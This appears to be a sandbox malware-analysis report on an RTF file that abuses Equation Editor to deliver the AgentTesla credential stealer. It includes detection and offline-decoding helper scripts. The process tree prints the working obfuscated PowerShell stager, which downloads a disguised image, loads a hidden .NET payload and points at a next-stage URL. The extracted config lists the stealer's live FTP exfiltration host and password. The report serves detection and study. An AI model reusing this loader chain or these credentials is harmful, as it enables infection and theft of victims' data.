Analysis

  • max time kernel
    120s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64
    arch:x86
    image:win7-20240221-en
    locale:en-us
    os:windows7-x64
    system
  • submitted
    25-04-2024 11:45

General

  • Target

    Unconfirmed 977108.rtf

  • Size

    69KB

  • MD5

    bd7a9eba72d2a2a8cc97260ec906b842

  • SHA1

    ecf9f969b5f2b687aaf73c6173807cdaad151adb

  • SHA256

    6dd61f18a3cd350daf98d26c0ce32c935fae9a5458ee6e0d8f9fa843be227e02

  • SHA512

    8eb5705bba4a86df8b08d3c9b7db67fa382541469905e3196c5d95f02ab77da5bfc60ba2316ae3c9102190bbf8bf09fd642889916a68c4d0452f4f911177ee69

  • SSDEEP

    1536:7LPx4QfgceatqBb1NTaYIjlQYYmatL6ZDngEaSa7XYtHoylWg3HK:7LZ4QoTatqBb1NTaYIRjyL6ZbhaSarYy

Malware Config

Extracted

Family

agenttesla

Credentials

  • Protocol:
    ftp
  • Host:
    ftp://ftp.fosna.net
  • Port:
    21
  • Username:
    [email protected]
  • Password:
    =A+N^@~c]~#I

Signatures

  • AgentTesla

    Agent Tesla is a .NET-based remote access tool (RAT) and credential stealer written in Visual Basic .NET.

  • Blocklisted process makes network request 7 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Office loads VBA resources, possible macro or embedded object present
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor (EQNEDT32.EXE) is a legacy Office component often targeted by exploits such as CVE-2017-11882; it has no legitimate reason to spawn child processes.

  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 25 IoCs
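
A process-creation rule set for the chain this report records, as an added example (not sandbox or report code). The events are constructed Sysmon EventID 1-style records shaped after the Processes tree: image paths, PIDs and command lines are the report's (the long scripts are truncated to '...'), while the parent PIDs of the two roots, 1000 and 700, are assumptions. It flags the behaviours behind the signatures listed above: EQNEDT32.EXE spawning anything (the CVE-2017-11882 pattern behind "Launches Equation Editor"), a script host running a file out of AppData, PowerShell started with a hidden window, an execution-policy bypass or an inline base64 decode, and a .NET framework host such as AddInProcess32.exe started by PowerShell (the SetThreadContext/WriteProcessMemory signatures). The extra host names beside AddInProcess32.exe are an assumed extension.

```python
import re

# Constructed process-creation events modelled on the report's Processes tree. Image paths, PIDs and
# command lines come from the report (scripts cut to '...'); ppids 1000 and 700 are assumptions.
EVENTS = [
    {"pid": 2896, "ppid": 1000, "image": r"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE",
     "cmdline": r'"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Unconfirmed 977108.rtf"'},
    {"pid": 2280, "ppid": 2896, "image": r"C:\Windows\splwow64.exe",
     "cmdline": r"C:\Windows\splwow64.exe 12288"},
    {"pid": 3020, "ppid": 700, "image": r"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "cmdline": r'"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding'},
    {"pid": 2372, "ppid": 3020, "image": r"C:\Windows\SysWOW64\WScript.exe",
     "cmdline": r'"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Morninggetitbackkissing.js"'},
    {"pid": 884, "ppid": 2372, "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = ...;$OWjuxd = (New-Object System.Text.UTF8Encoding).GetString([System.Convert]::FromBase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"'},
    {"pid": 2696, "ppid": 884, "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "function DownloadDataFromLinks { ... }"'},
    {"pid": 1844, "ppid": 2696, "image": r"C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe",
     "cmdline": r'"C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe"'},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
# AddInProcess32.exe is the host seen in this report; the other names are an assumed extension
# (signed .NET framework binaries that are likewise used as hollowing targets).
DOTNET_HOSTS = {"addinprocess32.exe", "addinprocess.exe", "regasm.exe", "regsvcs.exe"}
POWERSHELL_FLAGS = ("frombase64string", "-windowstyle hidden", "-executionpolicy bypass")
USER_WRITABLE = re.compile(r"\\users\\[^\\]+\\appdata\\", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (pid, ATT&CK technique, reason) tuples; one event can raise several."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        name = basename(e["image"])
        parent = by_pid.get(e["ppid"])
        pname = basename(parent["image"]) if parent else ""
        cmd = e["cmdline"].lower()
        if pname == "eqnedt32.exe":
            alerts.append((e["pid"], "T1203", "child of Equation Editor (CVE-2017-11882 pattern)"))
        if name in SCRIPT_HOSTS and USER_WRITABLE.search(cmd):
            alerts.append((e["pid"], "T1059.007", "script host running a file from a user-writable path"))
        if name == "powershell.exe" and any(f in cmd for f in POWERSHELL_FLAGS):
            alerts.append((e["pid"], "T1059.001", "PowerShell with hidden/bypass/inline-decode switches"))
        if name in DOTNET_HOSTS and pname == "powershell.exe":
            alerts.append((e["pid"], "T1055.012", ".NET framework host spawned by PowerShell (hollowing target)"))
    return alerts


def summarise(alerts):
    """Group alert PIDs by technique so a whole chain can be read at a glance."""
    out = {}
    for pid, tid, _ in alerts:
        out.setdefault(tid, set()).add(pid)
    return out


def chain(events, pid):
    """Walk ppid links back to the root so an alert can be shown with its full ancestry."""
    by_pid = {e["pid"]: e for e in events}
    out = []
    while pid in by_pid:
        out.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return list(reversed(out))


if __name__ == "__main__":
    for pid, tid, why in detect(EVENTS):
        print(pid, tid, " -> ".join(chain(EVENTS, pid)), "|", why)
```

Note that WINWORD.EXE never appears in the ancestry of the malicious branch: EQNEDT32.EXE is started out-of-process by COM, so a rule that only looks for Office spawning children misses this chain entirely. Anchoring the rule on the Equation Editor parent, as above, is what catches it.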

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Unconfirmed 977108.rtf"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2896
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2280
    • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      1⤵
      • Blocklisted process makes network request
      • Launches Equation Editor
      • Suspicious use of WriteProcessMemory
      PID:3020
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Morninggetitbackkissing.js"
        2⤵
        • Blocklisted process makes network request
        • Suspicious use of WriteProcessMemory
        PID:2372
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'ZnVuY3Rpb24gRG93bmxvYWREYXRhRnJvbUxpbmtzIHsgcGFyYW0gKFtzdHJpbmdbXV0kbGlua3MpICR3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyAkZG93bmxvYWRlZERhdGEgPSBAKCk7ICRzaHVmZmxlZExpbmtzID0gJGxpbmtzIHwgR2V0LVJhbmRvbSAtQ291bnQgJGxpbmtzLkxlbmd0aDsgZm9yZWFjaCAoJGxpbmsgaW4gJHNodWZmbGVkTGlua3MpIHsgdHJ5IHsgJGRvd25sb2FkZWREYXRhICs9ICR3ZWJDbGllbnQuRG93bmxvYWREYXRhKCRsaW5rKSB9IGNhdGNoIHsgY29udGludWUgfSB9OyByZXR1cm4gJGRvd25sb2FkZWREYXRhIH07ICRsaW5rcyA9IEAoJ2h0dHBzOi8vdXBsb2FkZGVpbWFnZW5zLmNvbS5ici9pbWFnZXMvMDA0Lzc3My84MTIvb3JpZ2luYWwvanMuanBnPzE3MTM4ODI3NzgnLCAnaHR0cHM6Ly91cGxvYWRkZWltYWdlbnMuY29tLmJyL2ltYWdlcy8wMDQvNzczLzgxMi9vcmlnaW5hbC9qcy5qcGc/MTcxMzg4Mjc3OCcpOyAkaW1hZ2VCeXRlcyA9IERvd25sb2FkRGF0YUZyb21MaW5rcyAkbGlua3M7IGlmICgkaW1hZ2VCeXRlcyAtbmUgJG51bGwpIHsgJGltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRpbWFnZUJ5dGVzKTsgJHN0YXJ0RmxhZyA9ICc8PEJBU0U2NF9TVEFSVD4+JzsgJGVuZEZsYWcgPSAnPDxCQVNFNjRfRU5EPj4nOyAkc3RhcnRJbmRleCA9ICRpbWFnZVRleHQuSW5kZXhPZigkc3RhcnRGbGFnKTsgJGVuZEluZGV4ID0gJGltYWdlVGV4dC5JbmRleE9mKCRlbmRGbGFnKTsgaWYgKCRzdGFydEluZGV4IC1nZSAwIC1hbmQgJGVuZEluZGV4IC1ndCAkc3RhcnRJbmRleCkgeyAkc3RhcnRJbmRleCArPSAkc3RhcnRGbGFnLkxlbmd0aDsgJGJhc2U2NExlbmd0aCA9ICRlbmRJbmRleCAtICRzdGFydEluZGV4OyAkYmFzZTY0Q29tbWFuZCA9ICRpbWFnZVRleHQuU3Vic3RyaW5nKCRzdGFydEluZGV4LCAkYmFzZTY0TGVuZ3RoKTsgJGNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGJhc2U2NENvbW1hbmQpOyAkbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRjb21tYW5kQnl0ZXMpOyAkdHlwZSA9ICRsb2FkZWRBc3NlbWJseS5HZXRUeXBlKCdQUk9KRVRPQVVUT01BQ0FPLlZCLkhvbWUnKTsgJG1ldGhvZCA9ICR0eXBlLkdldE1ldGhvZCgnVkFJJykuSW52b2tlKCRudWxsLCBbb2JqZWN0W11dICgndHh0LjQ0NDQ2ZXphYi83Ny4wNi41OS4zMi8vOnB0dGgnICwgJ2Rlc2F0aXZhZG8nICwgJ2Rlc2F0aXZhZG8nICwgJ2Rlc2F0aXZhZG8nLCdBZGRJblByb2Nlc3MzMicsJ2Rlc2F0aXZhZG8nKSl9fQ==';$OWjuxd = (New-Object 
System.Text.UTF8Encoding).GetString([System.Convert]::FromBase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
          3⤵
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:884
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/812/original/js.jpg?1713882778', 'https://uploaddeimagens.com.br/images/004/773/812/original/js.jpg?1713882778'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.44446ezab/77.06.59.32//:ptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32','desativado'))}}"
            4⤵
            • Blocklisted process makes network request
            • Drops file in System32 directory
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2696
            • C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe
              "C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe"
              5⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1844
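
Recovering the loader's pieces offline, as an added analysis helper (not code from the sample, the sandbox or this report). The Python below reproduces in plain form what the two powershell.exe stages above do, so the payload and the VAI() arguments can be examined without executing anything: it decodes the $Codigo layer, cuts the bytes between <<BASE64_START>> and <<BASE64_END>> exactly as the stager does, checks that Assembly.Load would receive a PE image, and reverses the first VAI argument, which the script stores backwards. The $Codigo prefix and the Invoke(...) fragment are copied from the command lines above; the fake image and the MZ/PE stub are constructed for the example and are not a real assembly.

```python
import base64
import re
from typing import Optional

START_FLAG = b"<<BASE64_START>>"
END_FLAG = b"<<BASE64_END>>"


def decode_stage1(codigo_b64: str) -> str:
    """Stage 1: $Codigo is plain base64 of the UTF-8 PowerShell script run by the child powershell.exe."""
    return base64.b64decode(codigo_b64).decode("utf-8")


def extract_payload(image_bytes: bytes) -> Optional[bytes]:
    """Stage 2: the same cut the stager makes on the downloaded 'js.jpg'.

    Returns the base64-decoded bytes between the two markers, or None when the
    markers are absent or out of order (the stager then silently does nothing).
    """
    start = image_bytes.find(START_FLAG)
    end = image_bytes.find(END_FLAG)
    if start < 0 or end <= start:
        return None
    return base64.b64decode(image_bytes[start + len(START_FLAG):end])


def looks_like_pe(blob: bytes) -> bool:
    """Assembly.Load() expects a PE image: check the MZ stub and the PE signature at e_lfanew."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(blob[0x3C:0x40], "little")
    return blob[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def invoke_args(stage2_script: str) -> list:
    """Pull the string arguments handed to PROJETOAUTOMACAO.VB.Home.VAI(...)."""
    m = re.search(r"GetMethod\('VAI'\)\.Invoke\(\$null,\s*\[object\[\]\]\s*\((.*?)\)\)",
                  stage2_script, re.S)
    return re.findall(r"'([^']*)'", m.group(1)) if m else []


def unreverse(s: str) -> str:
    """The first VAI argument is the next-stage URL written backwards ('...//:ptth')."""
    return s[::-1]


# --- inputs -----------------------------------------------------------------
# First 52 characters of the $Codigo string from the report (a whole number of base64 quanta).
CODIGO_PREFIX = "ZnVuY3Rpb24gRG93bmxvYWREYXRhRnJvbUxpbmtzIHsgcGFyYW0g"

# The Invoke(...) fragment of the stage-2 script, as it appears in the report.
STAGE2_FRAGMENT = (
    "$method = $type.GetMethod('VAI').Invoke($null, [object[]] "
    "('txt.44446ezab/77.06.59.32//:ptth' , 'desativado' , 'desativado' , "
    "'desativado','AddInProcess32','desativado'))}}"
)

# Constructed stand-in for the downloaded 'image': JPEG-looking junk, then the markers around a
# base64 blob. The blob is a 68-byte MZ/PE header stub built here, not a real assembly.
_stub = bytearray(0x44)
_stub[0:2] = b"MZ"
_stub[0x3C:0x40] = (0x40).to_bytes(4, "little")
_stub[0x40:0x44] = b"PE\0\0"
FAKE_IMAGE = (b"\xff\xd8\xff\xe0JFIF-junk-bytes" + START_FLAG
              + base64.b64encode(bytes(_stub)) + END_FLAG + b"\xff\xd9")


def analyse(image_bytes: bytes, stage2_script: str) -> dict:
    """Run the full recovery and return the indicators an analyst wants out of this loader."""
    payload = extract_payload(image_bytes)
    args = invoke_args(stage2_script)
    return {
        "payload_size": len(payload) if payload else 0,
        "payload_is_pe": looks_like_pe(payload) if payload else False,
        "next_stage_url": unreverse(args[0]) if args else None,
        "injection_target": args[4] if len(args) > 4 else None,
    }


if __name__ == "__main__":
    print(decode_stage1(CODIGO_PREFIX))
    print(analyse(FAKE_IMAGE, STAGE2_FRAGMENT))
```

The reversed first argument decodes to an http:// URL on a bare IP ending in .txt, and the fifth argument names AddInProcess32, which matches the process the second powershell.exe spawns at the bottom of the tree. When the real js.jpg is pulled from the sandbox's network capture, feed it to extract_payload() and hash the result before loading it anywhere; the two download links in the script are identical, so the Get-Random shuffle adds no redundancy here.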

    Network

    MITRE ATT&CK Enterprise v15

    Downloads

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
      Filesize

      68KB

      MD5

      29f65ba8e88c063813cc50a4ea544e93

      SHA1

      05a7040d5c127e68c25d81cc51271ffb8bef3568

      SHA256

      1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

      SHA512

      e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      344B

      MD5

      3a3f9c63387d65adc2c5a0895fea6359

      SHA1

      4eb991c3c16c91752cc1ce174de8197187bf9e83

      SHA256

      38f3e502e85580a50040d3d7908ca5e401f39ec7738bee3be68b7218b36506e1

      SHA512

      3e74b7fb8a476ea20375cc08484e3dcbad8921d0022d0474a05a312a7aa741cfca043b607f9fd00dd5ceeecf22406740a772ef6014ed081fe5a7949e83d16bc1

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      344B

      MD5

      6c235629bbb06e61f7891429f6c850fa

      SHA1

      bfa3a268278621fb939b744b015d824e4d76fec2

      SHA256

      734e049b51e78c915263aa9fb943ad8210275ecc78033b4de7ee80d2d4ee6f33

      SHA512

      73311dde6ccfc328a2e6699f41c09724ff5fbc65de7fb258a8b3b407dbf8cc388ff10278b2550c56c14963e7aca6e975998fbff7ae5ac6e29122b07d3566e011

    • C:\Users\Admin\AppData\Local\Temp\CabBD08.tmp
      Filesize

      65KB

      MD5

      ac05d27423a85adc1622c714f2cb6184

      SHA1

      b0fe2b1abddb97837ea0195be70ab2ff14d43198

      SHA256

      c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

      SHA512

      6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

    • C:\Users\Admin\AppData\Local\Temp\TarBD78.tmp
      Filesize

      171KB

      MD5

      9c0c641c06238516f27941aa1166d427

      SHA1

      64cd549fb8cf014fcd9312aa7a5b023847b6c977

      SHA256

      4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

      SHA512

      936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

    • C:\Users\Admin\AppData\Local\Temp\TarBED6.tmp
      Filesize

      177KB

      MD5

      435a9ac180383f9fa094131b173a2f7b

      SHA1

      76944ea657a9db94f9a4bef38f88c46ed4166983

      SHA256

      67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

      SHA512

      1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
      Filesize

      20KB

      MD5

      1b07c0ee480c0098aa322cb3e28c42b3

      SHA1

      391b5b5f85558a5d9f2cb74379ce458cc3ef5fda

      SHA256

      8caefd38f21200aaa8cf063b38005e2b59e5100bf20b1517939de9aa0e445165

      SHA512

      bc5507fd886c3dccc4350184b2a5ff245cc879a3e6dbb8ebfbe8c5808e62d58c6d1da75d37b31ee1b003d8090c8d79e7c2f5397ce7d7cab9c3835b0e0266c911

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
      Filesize

      7KB

      MD5

      2e03e01dea5c87e3d4ec24121e12aa42

      SHA1

      7e8e62024a443743ca4fc951ab42cdc1abc7f4ff

      SHA256

      0a1bd6150c7943ad4addc2b3ac214a92f034b54ecec6d2eac73c5ecdf10b1f67

      SHA512

      f2072545b577db272f65a016437e1858e46f2fdf65c97cd6d159b137f5623425669dfa9d9293a83eecd39db194b2ff3e6b61d42ea00651f0a0571f5e9080d25d

    • C:\Users\Admin\AppData\Roaming\Morninggetitbackkissing.js
      Filesize

      5KB

      MD5

      ac0d326c138bf899aee07f61650876ee

      SHA1

      ee943015e8812841cac37f7612f0faf718eb7cc4

      SHA256

      b0e344c282bfc88a1b0690186bbd8f7c0901efbedb8aa56a8bfc2091bbd5b906

      SHA512

      882336e84f9119777e05ef3c221cdcd2271db763e0aab200cc6573b895ff83c5c2182042dd382725638ec655a58feadfb79985d06324e746c8769be230596d86

    • memory/884-35-0x000000006A620000-0x000000006ABCB000-memory.dmp
      Filesize

      5.7MB

    • memory/884-130-0x00000000024B0000-0x00000000024F0000-memory.dmp
      Filesize

      256KB

    • memory/884-129-0x00000000024B0000-0x00000000024F0000-memory.dmp
      Filesize

      256KB

    • memory/884-128-0x000000006A620000-0x000000006ABCB000-memory.dmp
      Filesize

      5.7MB

    • memory/884-131-0x00000000024B0000-0x00000000024F0000-memory.dmp
      Filesize

      256KB

    • memory/884-38-0x00000000024B0000-0x00000000024F0000-memory.dmp
      Filesize

      256KB

    • memory/884-37-0x000000006A620000-0x000000006ABCB000-memory.dmp
      Filesize

      5.7MB

    • memory/884-36-0x00000000024B0000-0x00000000024F0000-memory.dmp
      Filesize

      256KB

    • memory/884-151-0x000000006A620000-0x000000006ABCB000-memory.dmp
      Filesize

      5.7MB

    • memory/1844-143-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
      Filesize

      4KB

    • memory/1844-141-0x0000000000400000-0x0000000000442000-memory.dmp
      Filesize

      264KB

    • memory/1844-155-0x00000000048F0000-0x0000000004930000-memory.dmp
      Filesize

      256KB

    • memory/1844-154-0x00000000667F0000-0x0000000066EDE000-memory.dmp
      Filesize

      6.9MB

    • memory/1844-153-0x00000000048F0000-0x0000000004930000-memory.dmp
      Filesize

      256KB

    • memory/1844-152-0x00000000667F0000-0x0000000066EDE000-memory.dmp
      Filesize

      6.9MB

    • memory/1844-149-0x0000000000400000-0x0000000000442000-memory.dmp
      Filesize

      264KB

    • memory/1844-147-0x0000000000400000-0x0000000000442000-memory.dmp
      Filesize

      264KB

    • memory/1844-145-0x0000000000400000-0x0000000000442000-memory.dmp
      Filesize

      264KB

    • memory/1844-142-0x0000000000400000-0x0000000000442000-memory.dmp
      Filesize

      264KB

    • memory/1844-136-0x0000000000400000-0x0000000000442000-memory.dmp
      Filesize

      264KB

    • memory/1844-138-0x0000000000400000-0x0000000000442000-memory.dmp
      Filesize

      264KB

    • memory/2696-133-0x0000000002670000-0x00000000026B0000-memory.dmp
      Filesize

      256KB

    • memory/2696-150-0x000000006A620000-0x000000006ABCB000-memory.dmp
      Filesize

      5.7MB

    • memory/2696-135-0x0000000002670000-0x00000000026B0000-memory.dmp
      Filesize

      256KB

    • memory/2696-47-0x0000000002670000-0x00000000026B0000-memory.dmp
      Filesize

      256KB

    • memory/2696-134-0x000000006A620000-0x000000006ABCB000-memory.dmp
      Filesize

      5.7MB

    • memory/2696-46-0x000000006A620000-0x000000006ABCB000-memory.dmp
      Filesize

      5.7MB

    • memory/2696-132-0x000000006A620000-0x000000006ABCB000-memory.dmp
      Filesize

      5.7MB

    • memory/2696-140-0x0000000002670000-0x00000000026B0000-memory.dmp
      Filesize

      256KB

    • memory/2696-45-0x0000000002670000-0x00000000026B0000-memory.dmp
      Filesize

      256KB

    • memory/2696-44-0x000000006A620000-0x000000006ABCB000-memory.dmp
      Filesize

      5.7MB

    • memory/2896-2-0x0000000070F2D000-0x0000000070F38000-memory.dmp
      Filesize

      44KB

    • memory/2896-126-0x0000000070F2D000-0x0000000070F38000-memory.dmp
      Filesize

      44KB

    • memory/2896-0-0x000000002F421000-0x000000002F422000-memory.dmp
      Filesize

      4KB

    • memory/2896-173-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/2896-1-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/2896-174-0x0000000070F2D000-0x0000000070F38000-memory.dmp
      Filesize

      44KB